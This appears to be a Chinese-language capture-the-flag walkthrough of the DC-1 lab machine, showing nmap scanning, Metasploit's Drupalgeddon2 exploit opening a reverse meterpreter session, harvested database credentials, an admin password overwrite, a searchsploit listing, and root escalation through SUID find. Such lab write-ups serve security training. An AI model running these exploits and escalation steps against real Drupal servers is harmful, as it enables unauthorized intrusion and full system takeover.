arp扫描
nmap 1 nmap -sS -sV -A -n 192.168.100.31
看样子是个 Drupal 站点
111/tcp:开放的 rpcbind 服务
ssh爆破 1 nmap --script=ssh-brute 192.168.100.31
无果
访问80端口
msf搜索漏洞
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 msf6 > use 1 [*] No payload configured, defaulting to php/meterpreter/reverse_tcp msf6 exploit(unix/webapp/drupal_drupalgeddon2) > info Name: Drupal Drupalgeddon 2 Forms API Property Injection Module: exploit/unix/webapp/drupal_drupalgeddon2 Platform: PHP, Unix, Linux Arch: php, cmd, x86, x64 Privileged: No License: Metasploit Framework License (BSD) Rank: Excellent Disclosed: 2018-03-28 Provided by: Jasper Mattsson a2u Nixawk FireFart wvu <wvu@metasploit.com> Module stability: crash-safe Available targets: Id Name -- ---- => 0 Automatic (PHP In-Memory) 1 Automatic (PHP Dropper) 2 Automatic (Unix In-Memory) 3 Automatic (Linux Dropper) 4 Drupal 7.x (PHP In-Memory) 5 Drupal 7.x (PHP Dropper) 6 Drupal 7.x (Unix In-Memory) 7 Drupal 7.x (Linux Dropper) 8 Drupal 8.x (PHP In-Memory) 9 Drupal 8.x (PHP Dropper) 10 Drupal 8.x (Unix In-Memory) 11 Drupal 8.x (Linux Dropper) Check supported: Yes Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- DUMP_OUTPUT false no Dump payload command output PHP_FUNC passthru yes PHP function to execute Proxies no A proxy chain of format type:host:port[,type:host:port][.. .] RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/u sing-metasploit/basics/using-metasploit.html RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI / yes Path to Drupal install VHOST no HTTP server virtual host Payload information: Avoid: 3 characters Description: This module exploits a Drupal property injection in the Forms API. Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are vulnerable. References: https://nvd.nist.gov/vuln/detail/CVE-2018-7600 https://www.drupal.org/sa-core-2018-002 https://greysec.net/showthread.php?tid=2912 https://research.checkpoint.com/uncovering-drupalgeddon-2/ https://github.com/a2u/CVE-2018-7600 https://github.com/nixawk/labs/issues/19 https://github.com/FireFart/CVE-2018-7600 Also known as: SA-CORE-2018-002 Drupalgeddon 2 View the full module info with the info -d command. msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set RHOSTS 192.168.100.31 RHOSTS => 192.168.100.31 msf6 exploit(unix/webapp/drupal_drupalgeddon2) > run [*] Started reverse TCP handler on 192.168.100.251:4444 [*] Running automatic check ("set AutoCheck false" to disable) [!] The service is running, but could not be validated. [*] Sending stage (39927 bytes) to 192.168.100.31 [*] Meterpreter session 1 opened (192.168.100.251:4444 -> 192.168.100.31:52398) at 2024-03-03 16:49:50 +0800
连接成功
寻找flag
翻译:
1 每一个好的CMS都需要一个配置文件--你也一样。
Drupal 的配置文件主要包括 settings.php 和 sites/default/settings.php。
翻译:
1 2 暴力破解和字典攻击并非是获取访问权限的唯一途径(而且你肯定需要访问权限)。 利用这些凭据,你能做什么?
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 $databases = array ( 'default' => array ( 'default' => array ( 'database' => 'drupaldb', 'username' => 'dbuser', 'password' => 'R0ck3t', 'host' => 'localhost', 'port' => '', 'driver' => 'mysql', 'prefix' => '', ), ), );
python写交互shell 1 2 python -c 'import pty; pty.spawn("/bin/bash")' www-data@DC-1:/var/www$
登录数据库 使用前面的账号dbuser密码R0ck3t登录
1 2 | 1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | 2 | Fred | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg
修改密码 法一:修改admin密码 加密脚本
1 cat /var/www/scripts/password-hash.sh
加密123456
1 php /path/to/password-hash.php "123456"
修改admin密码
1 2 3 4 5 6 7 mysql> use drupaldb; use drupaldb; Database changed mysql> update users set pass = "$S$D1UQvb3x7lKoCSX6S9K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin'; <K.r.wB202Lsa/r7fkOj7CelJsSEMFDJjGv" where name = 'admin'; Query OK, 1 row affected (0.00 sec) Rows matched: 1 Changed: 1 Warnings: 0
刷新登录
法二:添加admin权限用户 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 ┌──(root㉿kali)-[~/Desktop] └─# msfconsole , , / \ ((__---,,,---__)) (_) O O (_)_________ \ _ / |\ o_o \ M S F | \ \ _____ | * ||| WW||| ||| ||| =[ metasploit v6.3.19-dev ] + -- --=[ 2318 exploits - 1215 auxiliary - 412 post ] + -- --=[ 1234 payloads - 46 encoders - 11 nops ] + -- --=[ 9 evasion ] Metasploit tip: View missing module options with show missing Metasploit Documentation: https://docs.metasploit.com/ msf6 > searchsploit drupal [*] exec: searchsploit drupal -------------------------------------------------------------------- --------------------------------- Exploit Title | Path -------------------------------------------------------------------- --------------------------------- Drupal 4.0 - News Message HTML Injection | php/webapps/21863.txt Drupal 4.1/4.2 - Cross-Site Scripting | php/webapps/22940.txt Drupal 4.5.3 < 4.6.1 - Comments PHP Injection | php/webapps/1088.pl Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution | php/webapps/1821.php Drupal 4.x - URL-Encoded Input HTML Injection | php/webapps/27020.txt Drupal 5.2 - PHP Zend Hash ation Vector | php/webapps/4510.txt Drupal 5.21/6.16 - Denial of Service | php/dos/10826.sh Drupal 6.15 - Multiple Persistent Cross-Site Scripting Vulnerabilit | php/webapps/11060.txt Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) | php/webapps/34992.py Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session) | php/webapps/44355.php Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Passw | php/webapps/34984.py Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Passw | php/webapps/34993.php Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execu | php/webapps/35150.php Drupal 7.12 - Multiple Vulnerabilities | php/webapps/18564.txt Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php Drupal < 4.7.6 - Post Comments Remote Command Execution | php/webapps/3313.pl Drupal < 5.1 - Post Comments Remote Command Execution | php/webapps/3312.pl Drupal < 5.22/6.16 - Multiple Vulnerabilities | php/webapps/33706.txt Drupal < 7.34 - Denial of Service | php/dos/35415.txt Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasp | php/webapps/44557.rb Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Executi | php/webapps/44542.txt Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remot | php/webapps/44449.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Ex | php/remote/44482.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Ex | php/webapps/44448.py Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Rem | php/remote/46510.rb Drupal < 8.6.10 / < 8.5.11 - REST Module Remote Code Execution | php/webapps/46452.txt Drupal < 8.6.9 - REST Module Remote Code Execution | php/webapps/46459.py Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure | php/webapps/44501.txt Drupal avatar_uploader v7.x-1.0-beta8 - Cross Site Scripting (XSS) | php/webapps/50841.txt Drupal Module Ajax Checklist 5.x-1.0 - Multiple SQL Injections | php/webapps/32415.txt Drupal Module CAPTCHA - Security Bypass | php/webapps/35335.html Drupal Module CKEditor 3.0 < 3.6.2 - Persistent EventHandler Cross- | php/webapps/18389.txt Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent C | php/webapps/25493.txt Drupal Module CODER 2.5 - Remote Command Execution (Metasploit) | php/webapps/40149.rb Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution | php/remote/40144.php Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scrip | php/webapps/35397.txt Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary | php/webapps/37453.php Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: | php/webapps/35072.txt Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation | php/webapps/50361.txt Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit) | php/remote/40130.rb Drupal Module Sections - Cross-Site Scripting | php/webapps/10485.txt Drupal Module Sections 5.x-1.2/6.x-1.2 - HTML Injection | php/webapps/33410.txt -------------------------------------------------------------------- --------------------------------- Shellcodes: No Results msf6 > searchsploit 34992.py -p [*] exec: searchsploit 34992.py -p Exploit: Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User) URL: https://www.exploit-db.com/exploits/34992 Path: /usr/share/exploitdb/exploits/php/webapps/34992.py Codes: CVE-2014-3704, OSVDB-113371, SA-CORE-2014-005 Verified: True File Type: Python script, ASCII text executable, with very long lines (340) msf6 >
脚本:
https://www.exploit-db.com/exploits/34992
下载脚本使用即可
登录后找到flag3
翻译
1 特殊权限将帮助找到密码,但你需要使用-exec参数来执行该命令,以了解如何获取shadow文件中的内容。
1 2 3 Can you use this same method to find or access the flag in root? Probably. But perhaps it's not that easy. Or maybe it is?
1 2 3 你能用同样的方法找到或访问根目录中的标志吗? 可能可以。但也许并不那么简单。或许确实很简单?
shadow打不开
爆破
字典在wordlists里面
ssh连接
里面的flag就是刚才的flag4.txt
/usr/bin/find
提权 1 find / -name index.php -exec "/bin/sh" \;
可以看到提权成功,超级用户#
进入root目录
OVER
